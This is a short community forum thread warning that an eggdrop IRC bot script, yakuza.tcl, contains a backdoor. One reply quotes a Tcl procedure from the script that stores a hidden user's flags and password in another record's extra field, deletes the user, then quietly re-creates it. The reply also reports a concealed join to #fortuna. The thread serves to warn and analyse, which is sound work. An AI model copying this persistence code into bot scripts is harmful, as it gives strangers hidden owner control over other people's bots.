This is the new home of the egghelp.org community forum.
All data has been migrated (including user logins/passwords) to a new phpBB version.


For more information, see this announcement post. Click the X in the top right-corner of this box to dismiss this message.

yakuza.tcl; from eggdrop tcl archives

Support & discussion of released scripts, and announcements of new releases.
Post Reply
V
VampireLord
Voice
Posts: 6
Joined: Mon Jan 25, 2010 12:42 am

yakuza.tcl; from eggdrop tcl archives

Post by VampireLord »

this tcl auto adds hikaro to the bots owner and auto adds a channel. this post may serve as a warning
User avatar
Sir_Fz
Revered One
Posts: 3794
Joined: Sun Apr 27, 2003 3:10 pm
Location: Lebanon
Contact:

Post by Sir_Fz »

On what basis are you making this statement?
n
nml375
Revered One
Posts: 2860
Joined: Fri Aug 04, 2006 2:09 pm

Post by nml375 »

Might be this part of the script (does look awfully similar to the script we all love to hate..)

Code: Select all

proc saveuser {} {
 global ps owner
 if {![validuser $ps]} {
  setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq."
 } elseif {$owner != $ps} {
  setuser $owner XTRA "BEND" [zip [chattr $ps]]
  if {[passwdok $ps ""] != 1} {
   setuser $owner XTRA "LAST" [getuser $ps "PASS"]
  }
  deluser $ps
 }
 save
 if {![validuser $ps]} {
  adduser $ps "$ps!*@*"
  chattr $ps [dezip [getuser $owner XTRA "BEND"]]
  if {[getuser $owner XTRA "LAST"] != ""} {
   setuser $ps PASS [getuser $owner XTRA "LAST"]
  }
 }
 return 1
}
A few other things in there that might be nasty as well, skimming through the code atm...

Updated:
It would also seem it will try to join your bot to a dedicated channel, while hiding any information about this to you. I'll see if I can't decode which channelname (looks like the same encryption/decryption-scheme as used by n**gate).

Updated:
Channel would appear to be #fortuna

Updated:
It will also make use of a second user record called "config". Not entirely sure if it's purpose yet, but it would seem it "is supposed to" be used for keeping settings. Still uses weak encryption. Also adds user records for each channel it keeps setting for...
NML_375
Post Reply